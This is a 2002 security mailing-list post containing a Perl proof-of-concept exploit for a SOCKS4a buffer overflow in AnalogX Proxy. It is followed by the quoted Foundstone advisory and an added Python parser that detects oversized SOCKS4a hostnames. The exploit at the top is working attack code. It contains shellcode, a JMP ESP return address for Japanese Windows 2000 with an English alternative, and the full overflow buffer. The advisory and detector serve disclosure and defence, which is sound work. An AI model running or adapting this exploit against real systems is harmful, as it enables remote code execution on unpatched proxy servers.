This is a proof of concept exploit for the AnalogX Proxy SOCKS4A buffer overflow.
Tested on Japanese Windows 2000 Professional SP2.

#!/usr/local/bin/perl
#-----------------------------------------------------------
# AnalogX Proxy Version 4.10 exploit for Japanese Windows 2000 Pro (SP2)
# written by Kanatoko
# http://www.jumperz.net/
# thanx to: hsj (http://hsj.shadowpenguin.org/)
#-----------------------------------------------------------
use strict;
use warnings;
use Socket;

my $connect_host = "socks.example.com";
my $port = 1080;

# resolve the target and open a TCP connection to the SOCKS port
my $iaddr = inet_aton($connect_host) || die "Host Resolve Error.\n";
my $sock_addr = pack_sockaddr_in($port, $iaddr);
socket(SOCKET, PF_INET, SOCK_STREAM, 0) || die "Socket Error.\n";
connect(SOCKET, $sock_addr) || die "Connect Error\n";
select(SOCKET); $| = 1; select(STDOUT);   # unbuffered writes on the socket

# egg written by UNYUN (http://www.shadowpenguin.org/)
# 57bytes
my $egg = "\xEB\x27\x8B\x34\x24\x33\xC9\x33\xD2\xB2";
$egg .= "\x0B\x03\xF2\x88\x0E\x2B\xF2\xB8\xAF\xA7";
$egg .= "\xE6\x77\xB1\x05\xB2\x04\x2B\xE2\x89\x0C";
$egg .= "\x24\x2B\xE2\x89\x34\x24\xFF\xD0\x90\xEB";
$egg .= "\xFD\xE8\xD4\xFF\xFF\xFF";
$egg .= "notepad.exe";

# SOCKS4a request header: VN=4, CD=1 (CONNECT), DSTPORT, DSTIP 0.0.0.1
my $buf = "\x04\x01\x00\x19\x00\x00\x00\x01";
# USERID field, NUL-terminated
$buf .= "A" x 32;
$buf .= $egg;
$buf .= "\x00";
# hostname field (the overlong section described in the advisory below)
$buf .= "A" x 144;
# JMP ESP in user32.dll( Japanese Windows 2000 Pro SP2 ) : 0x77DF492B
# If you use English Windows 2000, try 0x77E2492B
$buf .= "\x2B\x49\xdf\x77";
# JMP +0x22
$buf .= "\xEB\x22";
$buf .= "\x00";

print SOCKET $buf;
close(SOCKET);

--
Kanatoko
JUMPER : http://www.jumperz.net/(Japanese)

On Mon, 1 Jul 2002 15:54:55 -0600 (MDT) Dave Ahmad wrote:
>
>
> Dave Ahmad
> SecurityFocus
> www.securityfocus.com
>
> ---------- Forwarded message ----------
> Return-Path:
> Delivered-To: da@securityfocus.com
> Received: (qmail 13630 invoked from network); 1 Jul 2002 21:32:14 -0000
> Received: from unknown (HELO mission.foundstone.com) (66.192.0.2)
>   by mail.securityfocus.com with SMTP; 1 Jul 2002 21:32:14 -0000
> X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
> content-class: urn:content-classes:message
> MIME-Version: 1.0
> Content-Type: text/plain;
>   charset="us-ascii"
> Content-Transfer-Encoding: quoted-printable
> Subject: Foundstone Advisory - Buffer Overflow in AnalogX Proxy
> Date: Mon, 1 Jul 2002 14:37:44 -0700
> Message-ID: <9DC8A3D37E31E043BD516142594BDDFAC47577@MISSION.foundstone.com>
> X-MS-Has-Attach:
> X-MS-TNEF-Correlator:
> Thread-Topic: Foundstone Advisory - Buffer Overflow in AnalogX Proxy
> Thread-Index: AcIhR4n3TkCXBJz4TAqNDSFSrIolUg==
> From: "Foundstone Labs"
> To:
>
> ----------------------------------------------------------------------
> FS Advisory ID: FS-070102-23-AXPR
>
> Release Date: July 1st, 2002
>
> Product: AnalogX Proxy
>
> Vendor: AnalogX (http://www.analogx.com)
>
> Vendor Advisory: See vendor web site
>
> Type: Buffer Overflow
>
> Severity: High
>
> Author: Robin Keir (robin.keir@foundstone.com)
>         Foundstone, Inc.
>         (http://www.foundstone.com)
>
> Operating Systems: Windows variants
>
> Vulnerable versions: Proxy v4.07 and previous
>
> Foundstone Advisory: http://www.foundstone.com/advisories.htm
> ---------------------------------------------------------------------
>
> Description
>
> A buffer overflow exists in AnalogX's Proxy software.
> Exploitation of this vulnerability allows remote execution of
> arbitrary code with the privileges of the Proxy daemon.
>
> Details
>
> Web Proxy overflow
>
> Sending an HTTP proxy request to the target system on TCP port 6588
> consisting of a single space character followed by 320 or more
> non-space characters followed by 2 carriage-return linefeeds causes
> a read access violation in the application. Manually dismissing the
> application error message box that is displayed on the affected system
> at this point will terminate the process. If the message box is not
> manually dismissed then repeated sending of the request causes repeated
> access violation message boxes to appear on the affected system up to
> the point where the service no longer responds.
>
> Different numbers of bytes sent cause different error conditions
> to occur, such as write access violations and Watcom memory
> error dialogs to appear.
>
> Socks4a buffer overflow.
>
> Sending a Socks4a request to the target system on TCP port 1080
> consisting of a hostname section of 140 or more characters will cause
> a write access violation application error. Manually dismissing the
> application error message box that is displayed on the affected system
> at this point will terminate the process. If the message box is not
> manually dismissed then repeated sending of the request causes repeated
> access violation message boxes to appear on the affected system up to
> the point where the service no longer responds.
>
> An example TCP packet to send is
>
> \x04\x01\x04\x38\x00\x00\x00abcd\x00#\x00
>
> where the '\xXX' characters signify their corresponding HEX binary
> values and the '#' is substituted with the DNS name of 140 or more
> characters.
>
> Solution:
>
> Refer to the vendor's web site for further details:
> http://www.analogx.com
>
> Credits:
>
> Foundstone would like to thank AnalogX for their prompt
> response and handling of this problem.
>
>
> Disclaimer:
>
> The information contained in this advisory is copyright (c) 2002
> Foundstone, Inc. and is believed to be accurate at the time of
> publishing, but no representation of any warranty is given,
> express, or implied as to its accuracy or completeness. In no
> event shall the author or Foundstone be liable for any direct,
> indirect, incidental, special, exemplary or consequential
> damages resulting from the use or misuse of this information.
> This advisory may be redistributed, provided that no fee is
> assigned and that the advisory is not modified in any way.
>
>
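The advisory above gives the SOCKS4a request layout and the trigger condition (a hostname section of 140 or more characters). The following is an added example, not code from the original post, from Foundstone or from AnalogX: a strict SOCKS4/SOCKS4a request parser in Python with a check that a front-end proxy or an IDS could apply to flag requests matching that condition before they reach a vulnerable parser. All function and class names are my own, and the sample requests are constructed here rather than captured; one of them follows the byte layout of the advisory's example packet with the '#' expanded to 140 characters.

```python
import struct
from dataclasses import dataclass
from typing import Optional, Tuple

# Threshold taken from the Foundstone advisory quoted above: a SOCKS4a
# hostname section of 140 or more characters triggers the overflow.
OVERFLOW_HOSTNAME_LEN = 140


@dataclass
class Socks4Request:
    command: int                # 0x01 = CONNECT, 0x02 = BIND
    dst_port: int
    dst_ip: bytes               # the 4 raw DSTIP bytes as sent on the wire
    user_id: bytes
    hostname: Optional[bytes]   # present only for SOCKS4a requests


def _take_cstring(data: bytes, offset: int) -> Tuple[bytes, int]:
    """Return the NUL-terminated field starting at offset and the offset just past the NUL."""
    end = data.find(b"\x00", offset)
    if end == -1:
        raise ValueError("unterminated field at offset %d" % offset)
    return data[offset:end], end + 1


def parse_socks4_request(data: bytes) -> Socks4Request:
    """Parse one SOCKS4 / SOCKS4a request.

    Layout: VN(1)=4, CD(1), DSTPORT(2, big-endian), DSTIP(4), USERID + NUL and,
    when DSTIP is 0.0.0.x with x != 0 (the SOCKS4a marker), HOSTNAME + NUL.
    Anything that does not fit this layout exactly is rejected.
    """
    if len(data) < 9:
        raise ValueError("request shorter than the 8-byte header plus a NUL")
    vn, cd, dst_port = struct.unpack("!BBH", data[:4])
    if vn != 4:
        raise ValueError("not a SOCKS4 request (VN=%d)" % vn)
    if cd not in (1, 2):
        raise ValueError("unknown SOCKS4 command %d" % cd)
    dst_ip = data[4:8]
    user_id, offset = _take_cstring(data, 8)
    hostname = None
    if dst_ip[:3] == b"\x00\x00\x00" and dst_ip[3] != 0:
        hostname, offset = _take_cstring(data, offset)
    if offset != len(data):
        raise ValueError("%d trailing bytes after request" % (len(data) - offset))
    return Socks4Request(cd, dst_port, dst_ip, user_id, hostname)


def socks4a_overflow_indicator(data: bytes) -> Optional[str]:
    """Return a reason string if the request matches the advisory's trigger
    condition (or cannot be parsed at all), or None if it looks benign."""
    try:
        req = parse_socks4_request(data)
    except ValueError as exc:
        return "malformed: %s" % exc
    if req.hostname is not None and len(req.hostname) >= OVERFLOW_HOSTNAME_LEN:
        return "socks4a hostname of %d bytes (>= %d)" % (len(req.hostname), OVERFLOW_HOSTNAME_LEN)
    return None


def build_socks4a_connect(port: int, user_id: bytes, hostname: bytes) -> bytes:
    """Build a well-formed SOCKS4a CONNECT request (used only to construct sample input)."""
    return (struct.pack("!BBH", 4, 1, port) + b"\x00\x00\x00\x01"
            + user_id + b"\x00" + hostname + b"\x00")


# Constructed sample requests, not captured traffic.
BENIGN_REQUEST = build_socks4a_connect(80, b"user", b"www.example.com")
OVERSIZED_REQUEST = build_socks4a_connect(80, b"user", b"A" * OVERFLOW_HOSTNAME_LEN)
TRUNCATED_REQUEST = OVERSIZED_REQUEST[:-1]   # final NUL missing
# Same byte layout as the advisory's example packet, '#' replaced by 140 characters.
ADVISORY_SHAPED_REQUEST = b"\x04\x01\x04\x38\x00\x00\x00abcd\x00" + b"h" * 140 + b"\x00"

if __name__ == "__main__":
    samples = (("benign", BENIGN_REQUEST), ("oversized", OVERSIZED_REQUEST),
               ("truncated", TRUNCATED_REQUEST), ("advisory-shaped", ADVISORY_SHAPED_REQUEST))
    for name, raw in samples:
        print("%-16s %s" % (name, socks4a_overflow_indicator(raw)))
```

The parser rejects unterminated fields and trailing bytes rather than tolerating them, because a permissive parser in front of a vulnerable one is exactly where such requests slip through. The 140-byte threshold is the advisory's figure for this product; a general-purpose front end would instead cap the hostname at the 255 bytes a DNS name can legitimately occupy.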